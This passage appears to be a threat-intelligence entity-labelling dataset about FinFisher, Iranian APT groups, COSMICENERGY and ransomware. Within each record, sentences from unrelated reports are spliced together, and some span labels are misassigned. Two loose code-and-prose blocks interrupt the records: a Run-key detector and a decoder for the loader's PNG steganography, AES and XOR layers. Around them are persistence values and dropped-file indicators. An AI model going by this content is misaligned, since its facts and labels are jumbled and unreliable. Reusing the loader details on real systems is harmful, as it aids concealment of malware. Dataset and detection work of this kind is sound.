All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it . STRATOFEAR \u2019s code references five predefined module types that have an ID value and an internal name :", "spans": [{"start": 233, "end": 238, "label": "Organization"}, {"start": 243, "end": 251, "label": "System"}, {"start": 302, "end": 318, "label": "System"}, {"start": 368, "end": 378, "label": "System"}, {"start": 495, "end": 513, "label": "Malware"}, {"start": 514, "end": 596, "label": "Malware"}]} {"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique called Heaven \u2019 s Gate . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . The payload is encoded inside a separate .png file using a technique called steganography . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": [{"start": 141, "end": 157, "label": "System"}, {"start": 172, "end": 196, "label": "Malware"}, {"start": 210, "end": 224, "label": "Malware"}, {"start": 365, "end": 372, "label": "Organization"}, {"start": 437, "end": 483, "label": "System"}]} {"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations . On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B . This then offered a means to log on using email providers , which could then capture the passwords and user names .", "spans": [{"start": 107, "end": 117, "label": "System"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 231, "end": 243, "label": "Organization"}]} {"text": "Figure 9 . 
In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . It\u2019s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022-41080 .", "spans": [{"start": 32, "end": 37, "label": "Organization"}, {"start": 83, "end": 100, "label": "Organization"}, {"start": 130, "end": 133, "label": "System"}, {"start": 204, "end": 225, "label": "Indicator"}, {"start": 259, "end": 270, "label": "Organization"}, {"start": 351, "end": 367, "label": "Vulnerability"}]} {"text": "Heaven \u2019 s Gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine . The HTA files contained job descriptions and links to job postings on popular employment websites . One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series . Exploitation of CVE-2023-4966 will not crash the NSPPE process or generate memory core dump files .", "spans": [{"start": 187, "end": 196, "label": "Malware"}, {"start": 197, "end": 233, "label": "Malware"}, {"start": 450, "end": 465, "label": "Vulnerability"}]} {"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran . To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values . 
New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": [{"start": 142, "end": 154, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 177, "end": 182, "label": "Organization"}, {"start": 397, "end": 408, "label": "Organization"}]} {"text": "After reversing these opcodes , we were able to update our interpreter script to support both 32-bit and 64-bit virtual machines used by FinFisher . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . The size of the payload is encoded within the first four pixels of the image . TLDR OilRig is leveraging a new backdoor dubbed Marlin as part of a longrunning espionage campaign that started in April 2018 .", "spans": [{"start": 137, "end": 146, "label": "Malware"}, {"start": 219, "end": 235, "label": "System"}, {"start": 238, "end": 241, "label": "Malware"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 379, "end": 385, "label": "Malware"}]} {"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the The OilRig group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . After obtaining the size , the malware will allocate an appropriate memory buffer and proceed to decode the remaining payload byte by byte . 
\u201c n.bat \u201d , which likely runs the native scilc.exe utility", "spans": [{"start": 421, "end": 433, "label": "Organization"}, {"start": 495, "end": 504, "label": "Organization"}, {"start": 507, "end": 517, "label": "Organization"}, {"start": 520, "end": 526, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 540, "end": 558, "label": "Organization"}, {"start": 723, "end": 781, "label": "Indicator"}]} {"text": "next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor APT34 uses a mix of public and non-public tools . The payload is encoded in the same way as the size \u2013 each byte of the payload is computed from the ARGB color codes of each subsequent pixel in the image . It uses a hardcoded mutex value to make sure that the victim is not infected twice by calling followed by a call to to check the last error code .", "spans": [{"start": 495, "end": 500, "label": "Organization"}, {"start": 515, "end": 542, "label": "System"}, {"start": 701, "end": 783, "label": "Malware"}, {"start": 787, "end": 847, "label": "Malware"}]} {"text": "with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment . APT34 often uses compromised accounts to conduct spear-phishing operations . 
If the payload is bigger than the image used to store it , the remaining payload bytes are simply appended to the image after its IEND marker , and read directly from the file . NoEscape is a new ransomware which has been doing the rounds in underground forums since May 2023 .", "spans": [{"start": 353, "end": 358, "label": "Organization"}, {"start": 370, "end": 390, "label": "System"}, {"start": 613, "end": 621, "label": "Malware"}]} {"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": [{"start": 114, "end": 119, "label": "Organization"}, {"start": 139, "end": 166, "label": "System"}, {"start": 252, "end": 267, "label": "System"}, {"start": 274, "end": 302, "label": "System"}, {"start": 551, "end": 563, "label": "Organization"}, {"start": 568, "end": 580, "label": "Organization"}, {"start": 620, "end": 632, "label": "Malware"}]} {"text": "The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler . In July 2017 , FireEye observed APT34 targeting an organization in the Middle East using the POWRUNER PowerShell-based backdoor and the downloader BONDUPDATER , which includes a domain generation algorithm ( DGA ) for command and control . The alpha channel byte remains unchanged . 
In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": [{"start": 111, "end": 118, "label": "Organization"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 189, "end": 223, "label": "System"}, {"start": 243, "end": 254, "label": "System"}, {"start": 458, "end": 465, "label": "Organization"}, {"start": 499, "end": 505, "label": "Organization"}]} {"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color . This type of vulnerability is known as a server-side request forgery ( SSRF ) .", "spans": [{"start": 138, "end": 146, "label": "System"}, {"start": 179, "end": 187, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 475, "end": 513, "label": "Vulnerability"}]} {"text": "Stage 3 : Installer that takes DLL side-loading to a new level Stage 3 represents the setup program for FinFisher . In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Decoding is a simple inverse operation . 
The ransomware then scans the disk ; any files matching predefined criteria are encrypted and the original files are deleted .", "spans": [{"start": 104, "end": 113, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 155, "end": 185, "label": "Vulnerability"}, {"start": 186, "end": 200, "label": "Vulnerability"}, {"start": 211, "end": 219, "label": "System"}, {"start": 224, "end": 235, "label": "System"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 331, "end": 341, "label": "Malware"}]} {"text": "It is the first plain stage that does not employ a VM or obfuscation . FireEye has identified APT35 operations dating back to 2014 . Windows converts the .png pixel RGBA value to an ARGB encoding via the GdipBitmapGetPixel API . Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": [{"start": 71, "end": 78, "label": "Organization"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 133, "end": 140, "label": "System"}, {"start": 204, "end": 226, "label": "System"}, {"start": 239, "end": 421, "label": "Malware"}]} {"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) . APT35 , also known as the Newscaster Team , is a threat group sponsored by the Iranian government that conducts long-term , resource-intensive operations to collect strategic intelligence . To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image . 
If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload \u2022 None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": [{"start": 66, "end": 90, "label": "System"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 294, "end": 309, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 519, "end": 532, "label": "System"}, {"start": 717, "end": 859, "label": "Indicator"}]} {"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses . APT35 typically targets military , diplomatic and government , media , energy , engineering , business services and telecommunications sectors in U.S. and the Middle East . After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload . This is expressed in the form of decimal digits .", "spans": [{"start": 64, "end": 92, "label": "Vulnerability"}, {"start": 148, "end": 157, "label": "Malware"}, {"start": 214, "end": 219, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 277, "end": 282, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 294, "end": 305, "label": "Organization"}, {"start": 308, "end": 325, "label": "Organization"}, {"start": 330, "end": 356, "label": "Organization"}, {"start": 531, "end": 578, "label": "Indicator"}]} {"text": "The setup code receives an installation command from the previous stage . APT35 has historically used unsophisticated tools like those listed below in Figure 3 . 
Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary\u2019s .rdata section . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 74, "end": 79, "label": "Organization"}, {"start": 102, "end": 123, "label": "System"}]} {"text": "In our test , this command was the value 3 . APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . The first two bytes of that array specify the relative offsets to the key and IV respectively . Furthermore , our analysis of the activity suggests Russia would be capable of developing similar capabilities against other SCADA systems and programming languages beyond MicroSCADA and SCIL .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 108, "end": 118, "label": "Organization"}, {"start": 123, "end": 143, "label": "Organization"}, {"start": 146, "end": 159, "label": "Organization"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 186, "end": 209, "label": "Organization"}, {"start": 212, "end": 215, "label": "Organization"}, {"start": 224, "end": 235, "label": "Organization"}, {"start": 238, "end": 255, "label": "Organization"}, {"start": 260, "end": 286, "label": "Organization"}, {"start": 437, "end": 443, "label": "Organization"}, {"start": 510, "end": 523, "label": "System"}, {"start": 528, "end": 549, "label": "System"}, {"start": 557, "end": 567, "label": "System"}, {"start": 572, "end": 576, "label": "System"}]} {"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder . 
Many of the fake personas utilized by APT35 claimed to be part of news organizations , which led to APT35 being referred to as the Newscaster Team . The loader uses the AES128 implementation from the open-source Crypto++2 library . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": [{"start": 41, "end": 57, "label": "Indicator"}, {"start": 105, "end": 121, "label": "Indicator"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 229, "end": 247, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 294, "end": 309, "label": "Organization"}, {"start": 375, "end": 392, "label": "System"}]} {"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program . Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn\u2019t appear that the malware authors have modified much of the original code . 
So far in 2023 , ransomware gangs hit the US , Germany , France , and the UK hard , with the US shouldering a hefty 43 % of all global attacks .", "spans": [{"start": 187, "end": 199, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 301, "end": 308, "label": "Organization"}, {"start": 311, "end": 320, "label": "Organization"}, {"start": 325, "end": 352, "label": "Organization"}, {"start": 445, "end": 453, "label": "System"}, {"start": 576, "end": 592, "label": "Organization"}, {"start": 601, "end": 603, "label": "Organization"}, {"start": 606, "end": 613, "label": "Organization"}, {"start": 616, "end": 622, "label": "Organization"}, {"start": 629, "end": 632, "label": "Organization"}, {"start": 652, "end": 654, "label": "Organization"}]} {"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function . 
The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": [{"start": 107, "end": 115, "label": "Indicator"}, {"start": 224, "end": 233, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}, {"start": 250, "end": 261, "label": "Indicator"}, {"start": 419, "end": 430, "label": "Indicator"}, {"start": 503, "end": 515, "label": "Organization"}, {"start": 516, "end": 523, "label": "Organization"}, {"start": 534, "end": 539, "label": "Organization"}, {"start": 612, "end": 619, "label": "Organization"}, {"start": 622, "end": 631, "label": "Organization"}, {"start": 636, "end": 663, "label": "Organization"}, {"start": 668, "end": 690, "label": "System"}, {"start": 759, "end": 774, "label": "System"}, {"start": 790, "end": 800, "label": "Organization"}, {"start": 864, "end": 868, "label": "Organization"}, {"start": 875, "end": 899, "label": "Organization"}, {"start": 925, "end": 933, "label": "Organization"}]} {"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company . The decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode . 
The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 4, "end": 16, "label": "Indicator"}, {"start": 20, "end": 32, "label": "Indicator"}, {"start": 124, "end": 133, "label": "Indicator"}, {"start": 275, "end": 287, "label": "Indicator"}, {"start": 498, "end": 514, "label": "System"}, {"start": 597, "end": 605, "label": "Organization"}, {"start": 641, "end": 646, "label": "Organization"}, {"start": 660, "end": 674, "label": "Organization"}, {"start": 725, "end": 751, "label": "System"}, {"start": 767, "end": 787, "label": "System"}, {"start": 848, "end": 853, "label": "Organization"}, {"start": 884, "end": 894, "label": "Organization"}]} {"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run . The attacker used a spear-phishing email containing a link to a fake resume hosted on a legitimate website that had been compromised . The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function . 
The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP \u2019s primary capabilities and contains many developer - supplied comments for the included code .", "spans": [{"start": 70, "end": 78, "label": "Indicator"}, {"start": 115, "end": 150, "label": "Indicator"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 194, "end": 211, "label": "Malware"}, {"start": 786, "end": 851, "label": "Indicator"}]} {"text": "The malware sets a registry value ( whose name is read from the configuration file ) to \u201c C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run \u201d . APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs . By analyzing the source code , researchers can identify similar patterns and techniques used by different threat actors , providing defenders with a way to proactively detect and block the new variants at the initial stage of an attack .", "spans": [{"start": 90, "end": 124, "label": "Indicator"}, {"start": 125, "end": 161, "label": "Indicator"}, {"start": 162, "end": 173, "label": "Indicator"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 213, "end": 228, "label": "System"}, {"start": 329, "end": 334, "label": "Organization"}, {"start": 335, "end": 341, "label": "System"}, {"start": 406, "end": 411, "label": "Organization"}, {"start": 416, "end": 419, "label": "Organization"}]} {"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds . 
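The persistence value described above, a Run-key entry that has rundll32.exe load d3d9.dll from C:\ProgramData with the export Control_Run, is a pattern worth triaging across a fleet. The following is an added example, not FinFisher's code and not from the report: it runs a small detector over constructed Run-key values (the AuditApp entry reproduces the value quoted in the text; the others are made up) and flags rundll32 targets that sit in user-writable locations or that carry the name of a System32 DLL while living elsewhere, which also covers the d3d9.dll to uxtheme.dll rename mentioned later in the text.

```python
# Added example (not FinFisher's code or the report's): triage Run-key values for
# the rundll32 side-loading pattern described in the text. Sample entries are
# constructed; the AuditApp one reproduces the value quoted on the page.
import re
from pathlib import PureWindowsPath

RUN_KEY = r"HKCU\Software\Microsoft\Windows\Run"

SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("AuditApp", r"C:\Windows\system32\rundll32.exe c:\ProgramData\AuditApp\d3d9.dll , Control_Run"),
    ("Tools", r'"C:\Program Files\Vendor\tray.exe" -n'),
    ("Theme", r'rundll32.exe "C:\Users\alice\AppData\Roaming\uxtheme.dll",Control_Run'),
]

# Locations any user can write to; a rundll32 target there deserves a look.
USER_WRITABLE = (r"c:\programdata", r"c:\users", r"c:\windows\temp")
# System32 DLL names the page shows being used as side-loading bait.
SYSTEM_DLL_NAMES = {"d3d9.dll", "uxtheme.dll"}

# rundll32[.exe] <dll>,<export>; tolerates quotes and the spaced " , " form.
RUNDLL_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?\.dll)"?\s*,\s*(?P<export>\w+)', re.I)


def triage_run_value(name, value):
    """Return a finding if the value is rundll32 loading a DLL from a user-writable
    path, or a System32 lookalike from outside System32; otherwise None."""
    m = RUNDLL_RE.search(value)
    if not m:
        return None
    dll = m.group("dll").strip().lower()
    reasons = []
    if dll.startswith(USER_WRITABLE):
        reasons.append("dll in user-writable path")
    if PureWindowsPath(dll).name in SYSTEM_DLL_NAMES and "\\system32\\" not in dll:
        reasons.append("system dll name outside System32")
    if not reasons:
        return None
    return {"key": RUN_KEY, "name": name, "dll": dll,
            "export": m.group("export"), "reasons": reasons}


def triage_run_key(values):
    """Run the check over (name, value) pairs read from the Run key."""
    return [f for f in (triage_run_value(n, v) for n, v in values) if f]


if __name__ == "__main__":
    for finding in triage_run_key(SAMPLE_RUN_VALUES):
        print(finding)
```

Feed it the output of a registry export (each value name with its data) and review the hits; the export name is worth keeping in the finding because an export that the legitimate DLL of that name does not have is strong corroboration.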
They then proceeded to log directly into the VPN using the credentials of the compromised user . The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system.ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) . Curl An open-source command-line tool for transferring data using various network protocols .", "spans": [{"start": 101, "end": 108, "label": "System"}, {"start": 186, "end": 221, "label": "System"}, {"start": 435, "end": 439, "label": "System"}]} {"text": "This indicates that the authors are trying to hide some messages shown by the system during the setup process . The resume contained the PupyRAT backdoor , which communicated with known APT35 infrastructure . Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": [{"start": 138, "end": 154, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 239, "end": 248, "label": "System"}]} {"text": "When loaded with startup command 2 , the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll . Once connected to the VPN , APT35 focused on stealing domain credentials from a Microsoft Active Directory Domain Controller to allow them to authenticate to the single-factor VPN and Office 365 instance . 
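The .png steganography, the key/IV selection from the 256-byte .rdata table, and the closing XOR with the first byte of system.ini are spread across several passages above; the block below puts them together as an added example. It is not the loader's code and not the Python script the text refers to. Assumptions the page does not state: the 4-byte size is little-endian; pixels are handled as 32-bit ARGB integers (the form GdipBitmapGetPixel returns); the overflow starts immediately after the IEND chunk's 4-byte CRC; the key and IV offsets in the table are relative to the start of that table. The AES-128-CBC step that sits between extract() and unmask() is left to whatever AES library the reader uses (the sample used Crypto++); the cover image, payload and table are constructed, and the cover is deliberately too small so that the after-IEND path is exercised.

```python
# Added example (not the loader's code or the page's script): a decoder that mirrors
# the .png steganography, key/IV selection and final XOR described in the text.
# Assumptions not stated on the page: little-endian 4-byte size; pixels as 32-bit
# ARGB ints (GdipBitmapGetPixel form); overflow starts right after IEND's CRC;
# key/IV offsets are relative to the start of the 256-byte table. The AES-128-CBC
# decryption between extract() and unmask() is left to your AES library.
import struct


def decode_byte(argb):
    """One payload byte per pixel: bits 0-2 from R, 3-5 from G, 6-7 from B."""
    r = (argb >> 16) & 0xFF
    g = (argb >> 8) & 0xFF
    b = argb & 0xFF
    return (r & 0x07) | ((g & 0x07) << 3) | ((b & 0x03) << 6)


def encode_byte(argb, value):
    """Inverse of decode_byte: only the low bits of R, G, B change; alpha is kept."""
    a = (argb >> 24) & 0xFF
    r = ((argb >> 16) & 0xF8) | (value & 0x07)
    g = ((argb >> 8) & 0xF8) | ((value >> 3) & 0x07)
    b = (argb & 0xFC) | ((value >> 6) & 0x03)
    return (a << 24) | (r << 16) | (g << 8) | b


def embed(pixels, payload):
    """Write size header + payload into the pixels; return (pixels, overflow bytes)."""
    data = struct.pack("<I", len(payload)) + payload
    out = list(pixels)
    for i, v in enumerate(data[:len(out)]):
        out[i] = encode_byte(out[i], v)
    return out, data[len(out):]


def build_png_tail(overflow):
    """Constructed stand-in for the end of a PNG file: IEND chunk, then appended bytes."""
    return struct.pack(">I", 0) + b"IEND" + b"\xae\x42\x60\x82" + overflow


def extract(pixels, png_bytes):
    """Mirror the loader: size from the first four pixels, body from the following
    pixels, and the remainder from after the IEND marker if the image is too small."""
    if len(pixels) < 4:
        raise ValueError("image too small for the size header")
    size = struct.unpack("<I", bytes(decode_byte(p) for p in pixels[:4]))[0]
    body = bytes(decode_byte(p) for p in pixels[4:4 + size])
    if len(body) < size:
        iend = png_bytes.rfind(b"IEND")
        if iend < 0:
            raise ValueError("IEND marker not found")
        tail = png_bytes[iend + 4 + 4:]  # skip the marker and its CRC
        body += tail[:size - len(body)]
    if len(body) != size:
        raise ValueError("truncated payload: expected %d bytes, got %d" % (size, len(body)))
    return body


def key_iv_from_table(table):
    """The first two bytes of the 256-byte .rdata table are the offsets of the
    16-byte AES key and IV inside that same table."""
    if len(table) != 256:
        raise ValueError("expected a 256-byte table")
    koff, voff = table[0], table[1]
    if koff + 16 > 256 or voff + 16 > 256:
        raise ValueError("key or IV offset runs past the end of the table")
    return bytes(table[koff:koff + 16]), bytes(table[voff:voff + 16])


def unmask(blob, ini_first_byte=0x3B):
    """Last layer: XOR with the first byte of C:\\Windows\\system.ini, normally ';' (0x3B)."""
    return bytes(x ^ ini_first_byte for x in blob)


if __name__ == "__main__":
    # Constructed cover of 8 opaque pixels; the 10-byte payload does not fit, so
    # the last bytes land after IEND exactly as the page describes.
    cover = [0xFF102030 + i for i in range(8)]
    secret = bytes(range(1, 11))
    stego, overflow = embed(cover, secret)
    recovered = extract(stego, build_png_tail(overflow))
    print("recovered:", recovered.hex(), "overflow bytes:", len(overflow))
```

In practice you take the pixels from the real cover with any image library, run extract(), hand the result with the key and IV from key_iv_from_table() to an AES-128-CBC decrypt, and apply unmask() with the byte you actually read from the victim's system.ini; if that file has been edited so that it no longer starts with ';', the sample decrypts to garbage, which is a cheap way to break this loader in a lab.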
Varies : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 73, "end": 90, "label": "Indicator"}, {"start": 139, "end": 147, "label": "Indicator"}, {"start": 151, "end": 162, "label": "Indicator"}, {"start": 193, "end": 198, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 400, "end": 405, "label": "Organization"}, {"start": 436, "end": 446, "label": "Organization"}]} {"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) . While having access to the organization 's environment , the Magic Hound targeted data related to entities in the Middle East . 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 . COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": [{"start": 65, "end": 77, "label": "Indicator"}, {"start": 348, "end": 412, "label": "Indicator"}, {"start": 480, "end": 487, "label": "System"}, {"start": 490, "end": 493, "label": "System"}, {"start": 508, "end": 513, "label": "Organization"}, {"start": 544, "end": 556, "label": "Malware"}, {"start": 645, "end": 661, "label": "Organization"}]} {"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware . 
Mandiant has previously observed targeted attackers stealing email , but few threat actors have been as successful at this as APT35 . While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant . In this incident , the attacker leveraged an EOL version of the MicroSCADA supervisory control system .", "spans": [{"start": 109, "end": 117, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 186, "end": 199, "label": "Organization"}, {"start": 235, "end": 240, "label": "Organization"}, {"start": 432, "end": 435, "label": "System"}, {"start": 451, "end": 461, "label": "System"}]} {"text": "In this context , there is indeed no need to execute the stage 4 malware . The campaigns delivered PupyRAT , an open-source cross-platform remote access trojan ( RAT ) . The main differences are : The social media platform says it tied the groups malware samples to a specific Iranianbased IT contractor called Mahak Rayan Afraz , which has previously provided malware to the IRGC , indicating a link between the Tortoiseshell group and the Iranian government .", "spans": [{"start": 99, "end": 106, "label": "System"}, {"start": 139, "end": 159, "label": "System"}, {"start": 162, "end": 165, "label": "System"}, {"start": 201, "end": 222, "label": "Organization"}, {"start": 231, "end": 303, "label": "Malware"}, {"start": 311, "end": 328, "label": "Organization"}, {"start": 361, "end": 368, "label": "Malware"}, {"start": 376, "end": 380, "label": "Organization"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 441, "end": 459, "label": "Organization"}]} {"text": "The msvcr90.dll file is opened , read , and decrypted , and the code execution control is transferred to the RunDll exported routine . 
